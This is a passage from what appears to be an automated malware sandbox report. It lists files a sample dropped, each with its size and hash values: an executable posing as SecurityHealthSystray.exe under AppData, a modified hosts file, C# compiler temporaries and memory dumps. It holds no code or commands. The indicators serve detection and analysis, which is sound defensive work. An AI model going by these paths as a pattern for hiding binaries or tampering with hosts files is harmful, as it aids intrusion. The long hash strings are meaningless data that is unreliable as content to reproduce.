                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                  • C:\Users\Admin\AppData\Local\Temp\uyXYb7xb1e\Display (1).png

                                    Filesize

                                    413KB

                                    MD5

                                    22533ec30a719402342165ed80784e17

                                    SHA1

                                    d026628e53eda489fa0e9549bde228975c256118

                                    SHA256

                                    26dcc400d1fa6caa3ff6e01f5a73ca8609ced64452ca6efb589a50e3229eedf4

                                    SHA512

                                    8276b9c3f704b6013d598233c739b928fcb61bd8ffc69d40f3117e90c8b8d315ec2ad3d3041571bdabcc5d0db5f32170a9350183be7a22b1a0b441689fa415d8

                                  • C:\Users\Admin\AppData\Local\Temp\z2tv2bul\z2tv2bul.dll

                                    Filesize

                                    4KB

                                    MD5

                                    3fed61cf2df001b601d924d3dd5b3267

                                    SHA1

                                    4a06012636e95fcd3ab5ae0cacf0372a9f78031d

                                    SHA256

                                    d8e792f148913806eb3a0b64050580442db88c3a97e267405a960b56bce890c2

                                    SHA512

                                    e4f73d20e590ed8c599b2b96ae0281a31eae0fe7dd9cb389b93abe25ff6a1b66bc2a9d46373117c699e8fa6707737b5e51d10975f7cab586e7db27c9e06d84f8

                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

                                    Filesize

                                    9.3MB

                                    MD5

                                    df99beb55f643551ae73184125d723ec

                                    SHA1

                                    9ea0ac60ec61a64dcb9eb21509b76ee8799434d5

                                    SHA256

                                    e8692661ffd0327708f581369c56af975a541c6565b97af794c8b7adfa297c15

                                    SHA512

                                    b5cf419550d3331cbc1ff32a78b9bcc4f5694bbf2de351bb4d6d6812d705726d5651306ce8a9ac7fec82ad3c3922228dc5c09e49daf5b65528b2e09a02227f98

                                  • C:\Windows\System32\drivers\etc\hosts

                                    Filesize

                                    2KB

                                    MD5

                                    6e2386469072b80f18d5722d07afdc0b

                                    SHA1

                                    032d13e364833d7276fcab8a5b2759e79182880f

                                    SHA256

                                    ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                                    SHA512

                                    e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                                  • \??\c:\Users\Admin\AppData\Local\Temp\z2tv2bul\CSC5773B967F1984AAFB66FA26AAEF5ECA.TMP

                                    Filesize

                                    652B

                                    MD5

                                    6cf63a032681a7792896789643a738ba

                                    SHA1

                                    cffb9ca6e6be39ff2470ef23cbf705259d881b5e

                                    SHA256

                                    5534ee8042f92233dfb27a54365e4eeb8ac9f909243dcb288860ee9eb071c996

                                    SHA512

                                    0fb3af20c2e4fafb5eb8a8366eb77da8648897fec870f4bebccf43f73418f494fb968da528d5ee8836ea3314a1072a8df1a04c96055050d643be8802b26e90bb

                                  • \??\c:\Users\Admin\AppData\Local\Temp\z2tv2bul\z2tv2bul.0.cs

                                    Filesize

                                    1004B

                                    MD5

                                    c76055a0388b713a1eabe16130684dc3

                                    SHA1

                                    ee11e84cf41d8a43340f7102e17660072906c402

                                    SHA256

                                    8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                    SHA512

                                    22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                  • \??\c:\Users\Admin\AppData\Local\Temp\z2tv2bul\z2tv2bul.cmdline

                                    Filesize

                                    607B

                                    MD5

                                    b9007dfd5a72d9cb109c795795696cda

                                    SHA1

                                    9a6d77423218d29aef0092e0c76313f348433965

                                    SHA256

                                    7d6edc12edcdec583b7b1f3ab864a53d38b87947910b721288622ac7b2085971

                                    SHA512

                                    3dd533417d45fb5b9f802879f0777c14f899134cb93b5005464dbdd89d5b625afa21093400f0962e0d44d0789d11edc9bb8488908f79df5d7a59aa965bedec5f

                                  • memory/1916-4-0x0000028E32540000-0x0000028E32562000-memory.dmp

                                    Filesize

                                    136KB

                                  • memory/4932-54-0x000002EC2C4C0000-0x000002EC2C4C8000-memory.dmp

                                    Filesize

                                    32KB